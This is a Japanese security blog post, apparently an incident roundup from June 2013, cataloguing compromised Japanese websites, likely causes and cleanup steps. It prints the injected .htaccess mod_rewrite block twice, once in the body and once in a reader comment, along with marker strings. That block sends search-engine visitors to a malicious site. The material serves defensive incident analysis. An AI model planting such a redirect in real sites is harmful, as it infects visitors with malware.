2013-06-04
5月から多発しているHP改ざんインシデントをまとめてみた。
インシデントまとめ | |
概要
5月に入ってから複数の組織でホームページの改ざんが発生していると報じられています。この件に直接関連しているかは不明ですが、IPAや警察庁、トレンドマイクロもホームページの改ざんに関して注意喚起や情報を掲載しています。IPAは2008年に猛威を振るったGumblerによるものや2012年9月18日前後に多発したHP改ざんの規模に匹敵すると発表しています。ここでは5月以降発生している改ざんインシデントについてついてまとめます。
- (PDF)ウェブサイト改ざん事案の多発に係る注意喚起について - @police(警察庁)
- 2013年6月の呼びかけ「 ウェブサイトが改ざんされないように対策を! 」- IPA
- 日本を標的とするハクティビズム的 Web 改ざん攻撃を確認:今後の攻撃拡大に注意 - TrendMicro
- 日本のWebサイト改ざんを複数確認:PCは常に最新状態に! | トレンドマイクロ セキュリティ ブログ (ウイルス解析担当者による Trend Micro Security Blog)
改ざんの概要イメージ
現時点で判明している情報、及びそこから推測される内容を踏まえて一連の流れを図にしました。(改ざんが行われるまでの流れは推測部分が多く含まれます。)
改ざんされたサイト
5月以降、ホームページが改ざんされたことを公表しているサイトを以下に掲載します。全ての組織がこのように公表することはないと考えられるため、これらサイトも多発している改ざんの一部だと思われます。また以下のリストは「HPが改ざん」されたことを共通点としているだけであり、これら一連の改ざんが関連したものであるかは不明です。
No | 改ざんされたサイト | URL | 改ざん期間*1 | 改ざん原因 | 改ざん内容 | 掲載文 |
1 | 鹿児島県教職員互助組合 | kyogo.or.jp | 05/01 2:45〜05/02 13:32 | 掲載無 | ウィルスに感染する可能性 | *2 |
2 | アウンコンサルティング株式会社 | www.auncon.co.jp | 05/01〜05/07 | サーバーへの不正アクセス | ウィルスに感染する可能性 HEUR:Trojan.Script.Generic | *3 |
3 | 赤髭亭 | akahigetei.extrem.ne.jp | 掲載無 (05/18に判明、その後6/2に復旧するも再度改ざん) | 掲載無 | ウィルスに感染する可能性 JS:IFrame-BLN[Trj] JS:IFrame-AHU[Trj] | *4 *5 |
4 | 世界人権問題研究センター | www.mmjp.or.jp/jinken | 05/21〜05/28午後 | デンマークからの不正アクセス | ウィルスに感染する可能性 | *6 *7 |
5 | 有限会社APCブレーン | APCブレーン及び所属アーティスト含む関連ページ www.apc-brain.co.jp レディバード www.apc-brain.co.jp/ladybird | 05/22 19:37〜05:26 1:27 | 掲載無 | ウィルスに感染する可能性 Trojan:JS/Rediredtor.MB | *8 |
6 | 日本産業廃棄物処理振興センター | www.jwnet.or.jp/whatsnew/index.php www.jwnet.or.jp/oshirase/index.php www.jwnet.or.jp/workshop/index.php | 掲載無(修正は05/17) | 掲載無 | ウィルスに感染する可能性 TROJ_FAKEAV亜種 | *9 |
7 | リコージャパン | プリントアウトファクトリー www.printout.jp | 05/25 7時頃〜05/31 22時半頃 | 掲載無 | ウィルスに感染する可能性 トロイの木馬型マルウェア | *10 |
8 | 株式会社ディーバ | www.diva.co.jp | 05/25 15:50〜05/29 15:10 | 第三者の不正アクセス | ウィルスに感染する可能性 | *11 |
9 | 科学技術振興機構 | crds.jst.go.jp/5th/ crds.jst.go.jp/about_sympo/crds.jst.go.jp/access/crds.jst.go.jp/GIES/crds.jst.go.jp/daily/ | 05/25〜05/27 10時頃 2013/06/01〜2013/06/03 11時55分 | 掲載無 | 悪性サイトへ誘導される可能性 | *12 |
10 | 三重交通グループホールディングス株式会社 | 観光販売システムズホームページ kanko-pro.co.jp トライパルツアー sanq-tripal.com 熊野古道シャトルバス Kumanokodo.co.jp みえ観光ウェブ mie-kanko.jp | 05/26 17:00〜06/01 17:00 | 掲載無 | ウィルスに感染する可能性 | *13 *14 |
11 | 横浜シティ・エア・ターミナル株式会社 | YCAT www.ycat.co.jp | 05/26 23:00〜05/27 17:00 | 掲載無 | ウィルスに感染する可能性 | *15 |
12 | 神奈川県保険医協会 | 「いい医療.com」の一部 | 05/27 0:00〜14:00 | PC経由による不正アクセス | 悪性サイトへ誘導される可能性 | *16 *17 |
13 | 美浜町 | www.town.mihama.aichi.jp | 05/28 13:00〜16:00 | 掲載無 | ウィルスに感染する可能性 | *18 |
14 | 田原総一郎 | www.taharasoichiro.comの一部 | 05/28〜05/29 13時 | 掲載無 | 悪性サイトへ誘導 | *19 |
15 | 株式会社アーク | 京のすっぴんさん www.suppinsan.com | 05/28 15:17〜05/29 14:00 | 掲載無 | ウィルスに感染する可能性 | *20 |
16 | ワタナベ ランド | LAND et vous landetvous.com | 掲載無(掲載日付は05/29) | 掲載無 | ウィルスに感染する可能性 | *21 |
17 | ミツミ電機株式会社 | www.mitsumi.co.jp | 5/29 7:20〜13:37 | 3回にわたり不正アクセス | ウィルスに感染する可能性 | *22 |
18 | 株式会社アジュバンコスメジャパン | Re:PRO www.repro-top.com | 05/29 17:00〜06/01 9:25 | 掲載無 | ウィルスに感染する可能性 JS_Trojan.Crypt.MT | *23 |
19 | 情報ネットワーク法学会 | in-law.jp配下のWebページ全て | 05/29 19時〜05/30 12時 | FTPあるいはSSH | 悪性サイトへ誘導 | *24 |
20 | 沖縄県 | 県立玉城青少年の家 www.okinawa-nanjo-youthhome.jp | 05/29 20:00〜06/03 11:00 | 掲載無 | 文字化け ウィルスに感染する可能性 | *25 |
21 | 山梨県立塩山高等学校 | 塩山高校商業研究部 www.enzanh.kai.ed.jp/ENZAN business research club WEB/配下のページ塩山高校女子ソフトボール部 www.enzanh.kai.ed.jp/ENZAN softball club WEB/配下のページ | 05/29〜05/30 | 掲載無 | ウィルスに感染する可能性 | *26 |
22 | フジ印刷株式会社 | WarpStyle warpstyle.jp | 05/29〜05/30 12:00 | Webサーバーへの不正アクセス | ウィルスに感染する可能性 | *27 |
23 | 横浜市 | 横浜観光情報 www.welcome.city.yokohama.jp | 05/30 4:00〜16:30 | 掲載無 | 書き換えられたのみ | *28 |
24 | 横浜市 | www.kuraki-noh.jp | 05/30 10:00〜06/04 12:10 | 掲載無 | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *29 |
25 | 日比谷アミューズメントプランニング | らんの里 堂ヶ島 www.dogashima.com | 05/30 14:16〜18:22 | 掲載無 | ウィルスに感染する可能性 悪性サイトへ誘導される可能性 | *30 |
26 | 愛知県バドミントン協会 | www.badminton-aichi.comの一部 | 05/30 17:13〜06/01 17:30 | 掲載無 | ウィルスに感染する可能性 | *31 |
27 | 東京大学医学部付属病院 | www.h.u-tokyo.ac.jp | 05/30 20:00〜05/31 2:30 | 管理業者PC感染による改ざん | ウィルスに感染する可能性 | *32 |
28 | ときめきドットコム | シンニチプレミアムストア njpw-p.jp | 05/30 19時〜06/03 14時 | 掲載無 | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *33 |
29 | 姫路市まちづくり振興機構 | himeji-machishin.jp | 05/31 4:30〜17:00 | 掲載無 | ウィルスに感染する可能性 | *34 |
30 | 株式会社幼児教育実践研究所 | こぐま会 www.kogumakai.co.jp | 05/31 18:30〜06/04 10:00 | 掲載無 | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *35 |
31 | 株式会社テレワークマネジメント | www.telework-management.co.jpの一部 | 05/31未明〜11時頃 | 掲載無 | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *36 |
32 | ☆脱!カラオケコンプレックス | www.arcadia.gr.jp | 5月末〜06/04 AM | 掲載無 | ウィルスに感染する可能性 HEUR:Trojan.Script.Generic | *37 |
33 | エフエム群馬 | fmgunma.com | 06/01 5時〜06/03 13時 | 外部から不正アクセス | ウィルスに感染する可能性 | *38 |
34 | 仙台市農作物有害鳥獣対策協議会 | www.inocc.jpの一部 | 06/01〜06/03アクセス | 掲載無 | ウィルスに感染する可能性 | *39 |
35 | 株式会社ウェブメッセージ | plaza.rakuten.co.jp/toretama/ | 06/01〜06/02 | 掲載無 | 掲載無 | *40 |
36 | 北海道文教大学 | www.do-bunkyodai.ac.jp | 掲載無(06/02に判明) | 掲載無 | ウィルスに感染する可能性 | *41 |
37 | 神戸市立桃山台児童館 | www.eonet.ne.jp/~momoyamadai/ | 06/02〜06/03 | 掲載無 | ウィルスに感染する可能性 | *42 |
38 | 日本馬術連盟 | www.equitation-japan.comの一部 | 06/04 15:47〜17:25 | 掲載無 | 掲載無 | *43 |
39 | 有限会社ゆたぷろ | www.yutapro.comの一部 | 06/04 17:00〜06/05 11:45 | 掲載無 | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *44 |
40 | 能登空港利用促進協議会 | www.notohantou.net | 06/05 1:00〜10:00 | 第三者の不正アクセス | トップページが表示されない ウィルスに感染する可能性 | *45 |
41 | 札幌市 | 札幌市ワークライフ・バランス推進事業 www.sapporo-wlb.jp | 改ざん時期不明〜06/05 0:10 | 掲載無 | ウィルスに感染する可能性 JS_BLACOLE.SMTT | *46 *47 |
42 | 日本創造教育研究所 | ありがとう経営のすすめ arigatou-keiei.jp 業績アップ研修.com gyoseki-up.com 心に残るありがとう体験談募集 arigatou-taiken.jp 朝礼.com cho-rei.com ありがとう卓越経営大賞 arigatou-takuetsu.jp 人事セミナー.com yarigai-jinji.com ありがとうブログ arigatou-blog.com 建設みらい研究所 kensetsu-mirai.com | 05/29 20:42〜05/30 11:13 | 掲載無 | ウィルスに感染する可能性 Gumblarの亜種 | *48 |
43 | 有限会社 ビブリオポリ | www.bibliopoly.co.jp | 掲載無 | 掲載無 | 掲載無 | *49 |
44 | 株式会社アーク | www.organic-skincare.jpの一部 | 05/28 15:17〜05/29 12:40 | 第三者の不正アクセス | ウィルスに感染する可能性 | *50 |
45 | アール・ビー・コントロールズ株式会社 | www.rbcontrols.co.jpのHTMLファイル全て | 06/02 10:20〜06/03 10:00 | 第三者の不正アクセス | ウィルスに感染する可能性 JS/Kryptik.AKY | *51 |
この他改ざんによるものかは不明ながら福知山市HPでも5月末にアクセス不可の問題が発生していた模様。*52
01: 08.hanatoweb.jp
02: agc.bunka758.or.jp
03: arcwet.jp
04: asunaro-higashiosaka.jp
05: baseball.h01.jp
06: blog.willcare.jp
07: bellezza8.sakura.ne.jp
08: cdvnet.jp
09: finaledge.jp
10: fuchu.shogaigakushu.jp
11: jci763.or.jp
12: jqkk.jp
13: karilab.jp
14: miharagumi.jp
15: minikiti.wiki2.jp
16: mirai.sa-ba.jp
17: netrunner.sakura.ne.jp
18: nihongo-online.jp
19: soho.h01.jp
20: soulnote.jp
21: teramoto-law.jp
22: tokyo.cafemix.jp
23: toshei.jp
24: www.cdvnet.jp
25: www.chabai.jp
26: www.cleaningcoco.jp
27: www.coolspot-osaka.jp
28: www.dorf.co.jp
29: www.eiraitei.jp
30: www.fuzoku-watch.com
31: www.ginzado.ne.jp
32: www.hakkosya.co.jp
33: www.heaven-luxu.jp
34: www.hokudai.ac.jp
35: www.hosu-gogo.jp
36: www.ibiz.jp
37: www.jagra.or.jp
38: www.japanprimo.gr.jp
39: www.jicc.co.jp
40: www.k-amity.jp
41: www.ksbnet.co.jp
42: www.lcy.jp
43: www.maguchi.co.jp
44: www.naniwa-kenma.co.jp
45: www.nanbunoyu.jp
46: www.niccori-maccori.jp
47: www.nifa.co.jp
48: www.nodapg.or.jp
49: www.ostec.or.jp
50: www.plan-inc.jp
51: www.popcycle.co.jp
52: www.ruri-diet.jp
53: www.select.jp
54: www.shogakkan.jp
55: www.tohot.jp
56: www.videofes.jp
57: ベンツパーツ.jp
58: cattleya.sitemix.jp
59: www.technis.jp
改ざんされる内容
複数の方の報告によればWebサーバー上に配置されている次の拡張子のファイルの全部、または一部に対して、第三者による改ざんが行われています。改ざん方法にはいくつかの種類があり、確認されているものの多くは共通して「0c0896」という文字列が埋め込まれています。改ざんサイトを閲覧した際、悪性サイトへリダイレクトをさせ、そこでマルウェア(以下のese_adminさんのBlogによればFakeAV系)に感染させることを目的としているように見受けられるものの、wakatonoさんが分析されているように書き換えはできたものの埋め込みをしたJavaScriptが動作しない(いわゆる毒入れに失敗したかの)ようなケースもあるようです。*54
- HTMLファイル(.html)
- JSPファイル(.jsp)
- PHPファイル(.php)
- JavaScriptファイル(.js)
- JSONファイル(.json)
- テンプレートファイル(.tpl)
- 分散設定ファイル(.htaccess)
wakatonoさんが今回の件について、どのような改ざんが行われているかを分析されています。
以下の記事でも今回の改ざんについて、どのように行われているかを考察されています。
コメント欄でMASAKIさんより.htaccessの改ざんに関する情報を頂きました。検索やポータルサイト等からこの.htaccessが改ざんされたサイトを訪れた場合に悪性サイトへリダイレクトさせるものと思われます。
#0c0896#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://転送先URL [R=301,L]
</IfModule>
#/0c0896#
改ざんされた原因
現在進行形で起きているためか、改ざん原因について詳細を公表している組織はあまり多くありませんが、改ざん原因を発表している組織がいくつかあり、以下に抜粋します。
- 情報ネットワーク法学会
改ざんは、管理者アカウントを何らかの方法で入手してFTPあるいはSSHにより外部から実行されたものと判断しており
http://in-law.jp/
- 神奈川県保険医協会
本サイトの管理・運営委託会社のパソコンを経由して、サイト用サーバーに不正アクセスがあり、改ざんされるという被害を受けました
http://www.hoken-i.co.jp/outline/cat272/post_102.html
- 赤髭亭
先ほど赤髭亭をUPしているサーバーフォルダ内より観察のためHTMLファイルをダウンロードしソースを確認しようとした所、ウィルス駆除ソフトがDL対象のHTMLを
JS:IFrame-AHU[Trj]
であると判断し隔離駆除を行うという事態が発生いたしました。
よって、上記ウィルスが再UpしたHTMLに再度感染し何らかの改ざんを行った可能性を考え
http://sengoku.gflag.biz/?eid=1547350
- 東京大学医学部付属病院
当院がホームページのコンテンツ管理(CMS)を委託している企業側のパソコンがコンピュータウイルスに感染した事が原因でした。
http://www.h.u-tokyo.ac.jp/oshirase/archives/20130604.html
また、IPAが行った6月の呼びかけには『“パソコンのJavaのバージョンが古いままだったためにFTPアカウント情報を漏えいさせるウイルスに感染した”というウイルス感染のケース※もありました。』ともありました。
さらにこの件に関連していると思われる質問がYahoo知恵袋に投稿されています。この被害を受けた方はFTPサーバーを使っていたようです。
これらから、今回多発している改ざんは、Gumblerのようなマルウェア、あるいは情報を窃取するマルウェアを通じて管理用ID、パスワードが盗まれた*55ことが原因で改ざんされたのではないかと考えられます。*56
改ざんを受けた場合の対策
改ざん被害を受けたサイトはID、パスワードの変更だけにとどまるのではなく、次の点に対応漏れがないか確認してください。
- Webサイト管理用のアプリケーション(CMSや管理ソフト)が最新の状態かどうか
- Webサイトのメンテナンスは管理端末のみに接続が制限されているか
- 管理端末でウィルス対策ソフトによるスキャンが行われているか
- サーバー、管理端末のOS、ウィルス対策ソフト、ドキュメントソフト等がすべて最新の状態か
また今回の事例ではトップページではなく、その配下のWebページが改ざんされているケースも見受けられることから、改ざんされた事実に気づいていない可能性もあり、FTPログや管理するコンテンツに差分が発生していないかも確認したほうが良いでしょう。
関連
- トレンドマイクロは「ハクティビズム」目的の改ざんを警告:国内Webサイトで相次ぐ改ざん - @IT
- 「ガンブラー」事件に匹敵するWeb改ざん報告、IPAが対策徹底を呼び掛け - ITmedia エンタープライズ
- 不正スクリプト埋め込み型のウェブ改ざん被害、複数の国内サイトで確認 -INTERNET Watch
更新履歴
- 2013/06/04 PM 新規作成
- 2013/06/05 AM 北河さんから頂いた情報を反映
- 2013/06/05 AM @wakatonoさんのBlogを元に改ざんされていそうなサイトを列挙
- 2013/06/05 PM @yousukezanさんの情報等を元に最新情報を反映
- 2013/06/05 PM 最新情報を反映
- 2013/06/05 PM 最新情報を反映
- 2013/06/06 AM 最新情報を反映、改ざんの流れ概要イメージを追加
- 2013/06/06 AM 最新情報を反映
- 2013/06/06 PM 最新情報を反映、改ざんされたサイトを時系列に並び替え、MASAKIさんより頂いた改ざんが確認されている拡張子の情報を追加
- 2013/06/06 PM 最新情報を反映
*1:表記は全て2013年発生
*2:鹿児島県教職員互助組合ホームページの改ざんについて,鹿児島県教職互助組合,2013/06/06アクセス:魚拓
*3:コンピュータウイルス感染の報告とお詫び,アウンコンサルティング,2013/06/04アクセス:魚拓
*4:【重要】赤髭亭HP復旧延期についてのお知らせ,赤髭亭,2013/06/04アクセス:魚拓
*5:【重要】赤髭亭が表示されない件およびサーバー移転の御案内,赤髭亭,2013/06/04アクセス:魚拓
*6:世界人権問題研究センターからのお知らせ,世界人権問題研究センター,2013/06/04アクセス:魚拓
*7:HPがウイルス感染 世界人権問題研究センター 京都,MSN産経,2013/06/04アクセス:魚拓
*8:当社ホームページ及び関連ページの改ざんに関するお詫びとご報告,APCブレーン,2013/06/04アクセス
*9:当センターホームページの改ざんに関するお詫び,日本産業廃棄物処理振興センター,2013/06/04アクセス:魚拓
*10:「プリントアウトファクトリー」サイト改ざんに関するお知らせ,リコージャパン,2013/06/04アクセス:魚拓
*11:不正アクセスによるサイト改ざんについて,ディーバ,2013/06/06アクセス:魚拓
*12:ホームページ改ざんに関するお知らせとお詫び,科学技術振興機構,2013/06/04アクセス:魚拓
*13:(PDF)当社のグループ会社におけるWEBサイト改ざんについてのお詫び,三重交通グループホールディングス,2013/06/06アクセス
*14:(PDF)当社のグループ会社におけるWEBサイト改ざんについての追加情報,三重交通グループホールディングス,2013/06/06アクセス
*15:ホームページ改ざんに関するお知らせとお詫び,横浜シティ・エア・ターミナル,2013/06/06アクセス:魚拓
*16:神奈川県保険医協会ホームページ「いい医療.com」の改ざん発生について,神奈川県保険医協会,2013/06/04アクセス:魚拓
*17:(重要)本ウェブサイトの復旧のお知らせとお願い,神奈川県保険医協会,2013/06/04/アクセス:魚拓
*18:美浜町ホームページを閲覧された皆様へ、ホームページ改ざんに関するお詫び,美浜町,2013/06/04アクセス:魚拓
*19:ホームページ改ざんに関するお知らせとお詫び,田原総一郎,2013/06/04アクセス:魚拓
*20:ホームページ改ざんに関するお知らせとお詫び,アーク,2013/06/04アクセス:魚拓
*21:【Night on the Planet および LAND et vous より重要なお知らせ】,ワタナベランド,2013/06/04アクセス:魚拓
*22:<重要なお知らせ>不正アクセスによる障害のお知らせとウィルスチェックのお願い,ミツミ電機,2013/06/04アクセス:魚拓
*23:(PDF)当社ホームページの改ざんに関するお詫びとご報告,アジュバンコスメジャパン,2013/06/06アクセス
*24:ウェブサイト改ざんのご報告とお詫び,情報ネットワーク法学会,2013/06/04アクセス:魚拓
*25:【重要】県立玉城青少年の家ホームページ改ざんについて,沖縄県,2013/06/06アクセス:魚拓
*26:本校ウェブサイトへの不正アクセスについて,山崎県立塩山高等学校,2013/06/04アクセス:魚拓
*27:当Webサイト改ざんに関する報告とお詫び,フジ印刷,2013/06/06アクセス:魚拓
*28:ウェブサイト改ざんのご報告とお詫び,横浜市,2013/06/06アクセス:魚拓
*29:久良岐 お詫び,シグマコミュニケーションズ,2013/06/05アクセス:魚拓
*30:らんの里堂ヶ島ホームページに関するお詫びとお知らせ,日比谷アミューズメントプランニング,2013/06/04アクセス:魚拓
*31:公式サイト改ざんに関するお詫びとご報告,愛知県バドミントン協会,2013/06/05アクセス:魚拓
*32:当院ホームページの不正な改変事案に関する注意喚起とお詫びとお願い,東京大学医学部付属病院,2013/06/05アクセス:魚拓
*33:シンニチプレミアムストアご利用のお客様へ改ざんに関するお詫びとお知らせ,ときめきドットコム,2013/06/04アクセス:魚拓
*34:当機構ホームページの改ざんについて,姫路市まちづくり振興機構,2013/06/04アクセス:魚拓
*35:「当サイトの改ざんに関するお詫び」,幼児教育実践研究所,2013/06/06アクセス:魚拓
*36:弊社ホームページの改ざんに関するお詫び,テレワークマネジメント,2013/06/05アクセス:魚拓
*37:改ざん被害が発生しました…申し訳ございません。[カラオケスクールお知らせ],☆脱!カラオケコンプレックス,2013/06/04アクセス:魚拓
*38:ホームページ不正改ざんについてのお詫び,エフエム群馬,2013/06/04アクセス:魚拓
*39:仙台市農作物有害鳥獣対策協議会ホームページの一部が改ざんされました,仙台市,2013/06/04アクセス:魚拓
*40:ご連絡。,ウェブメッセージ,2013/06/06アクセス:魚拓
*41:本学「ホームページ」に関するお詫びとお知らせ,北海道文教大学,2013/06/04アクセス:魚拓
*42:神戸市立桃山台児童館のホームページを閲覧された方へ,神戸市,2013/06/05アクセス:魚拓
*43:日本馬術連盟ホームページの改ざん被害と復旧のご報告,日本馬術連盟,2013/06/05アクセス:魚拓
*44:弊社ホームページの改ざんに関するお詫び,ゆたぷろ,2013/06/05アクセス:魚拓
*45:ホームページ改ざんに関するお知らせとお詫び,能登空港利用促進協議会,2013/06/06アクセス:魚拓
*46:現在、「札幌市ワーク・ライフ・バランス推進事業」HPが閲覧できなくなっています。,札幌市,2013/06/06アクセス:魚拓
*47:札幌市HPがウイルス感染 閲覧者に確認呼び掛け,北海道新聞,2013/06/06アクセス:魚拓
*48:(PDF)当社の関連ホームページをご覧になった皆さまへのお願い,日本想像教育研究所,2013/06/06アクセス
*49:【ホームページ改ざんに関するお詫び − 復旧いたしました】,ビブリオポリ,2013/06/06アクセス:魚拓
*50:【当社サイト改竄に関するお詫び】,アーク,2013/06/06アクセス:魚拓
*51:弊社サイトの改ざんに関するお詫び,アール・ビー・コントロールズ,2013/06/06アクセス:魚拓
*52:福知山市のホームページがダウン 5時前に復旧,両丹日日新聞,2013/06/04アクセス:魚拓
*53:今回の改ざんで埋め込まれるJavaScriptとして報告されている特定の文字列の一部(『0c0896』や『catch(d21vd12v)』『ps="split";asd=function』)がGoogleの検索履歴に表示されるキャッシュに残っていたサイト
*54:検索で引っ掛かる場合の多くがこの毒入れ失敗パターンだとか。
*55:ただし相当数のサイトで改ざんされた時期が重なっており、人為的に行うのは相応の人数がいなければ難しいように思います。
*56:他には「ソフトウェアの脆弱性が放置されていた」、「単純なID、パスワードを使っていた」、「そもそも誰でも更新できる状況だった」も原因として考えられるでしょう。
- Twitter / @matcha445
- wakatonoの戯れメモ - あちこちで改ざん?
- Twitter / @Keisuke1234567
- Twitter / @hack_japan
- Twitter / @sotaromi8
- Twitter / @msaitotypeR
- Twitter / @RC31E
- Twitter / @kat21
- Twitter / @maplefish
- Twitter / @maida01
- Twitter / @tspeedstar
- まっちゃだいふくの日記★とれんどふりーく★ - 日本のWebサイト改...
- Twitter / @YoshihideMayumi
- Twitter / @ham68616d
- Twitter / @hirogoro62
- Twitter / @girigiribauer
- Twitter / @ys_masa
- Twitter / @takasi_sns
- Twitter / @Jitensha_sougyo
- Twitter / @sigh_too
- Twitter / @hannin_yasu
- Twitter / @merio_h
- 酔っ払いの独り言 - 2013年06月05日のツイート
- wakatonoの戯れメモ - 改ざんを受けた際の対策/改ざんされてないサ...
- Twitter / @benri_koujishi
- Twitter / @namihei_jodee
- Twitter / @440design
- Twitter / @mumiso
- Twitter / @keisuke_n
- Twitter / @bleu48
- Twitter / @tea_kc
- Twitter / @mami_6
- 相次ぐWeb改ざん被害 遅れる対応
MASAKI 2013/06/05 22:18 .htaccessに追記されているのも確認しました。
追記内容は以下の通りです。
#0c0896#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://転送先URL [R=301,L]
</IfModule>
#/0c0896#
piyokango 2013/06/06 02:29 情報ありがとうございます。記事中に引用させていただきました。
MASAKI 2013/06/06 12:24 掲載ありがとうございます。
私の方でリダイレクト処理の追記を現在確認しているファイルの拡張子は「.html」「.php」「.js」「.json」「.tpl」です。
「.json」「.tpl」は見落としがちかと思いますので、追加情報になるのかわかりませんが続けてコメントさせていただきました。
piyokango 2013/06/06 13:00 たびたび貴重な情報をありがとうございます。
改ざん対象として確認されている拡張子の一覧に頂いた情報を追加させていただきました。
カラオケ先生♪ 2013/06/06 15:33 piyokangoさん初めまして♪改ざんサイトのリストに入っています
「☆脱!カラオケコンプレックス」運営者のカラオケ先生こと北森@Arcadiaと申します。
調査を続けたところ、ウィルス対策ソフトに引っかからない、
JAVAの脆弱性をついて侵入するアドウェアらしきものが発見されました。
おそらくこれに私のFTP通信をロギングされていたものと思われます。
調査結果は後日ブログかサイトに追記いたします。
のちほど、こちらのサイトへのリンクを貼らせて下さい。
よろしくお願いいたします。
piyokango 2013/06/06 17:33 こんにちは。ご連絡ありがとうございます。
もし検体が確保できるようであれば、ハッシュ値やVirustotalのスキャン結果を共有頂けると大変ありがたいです。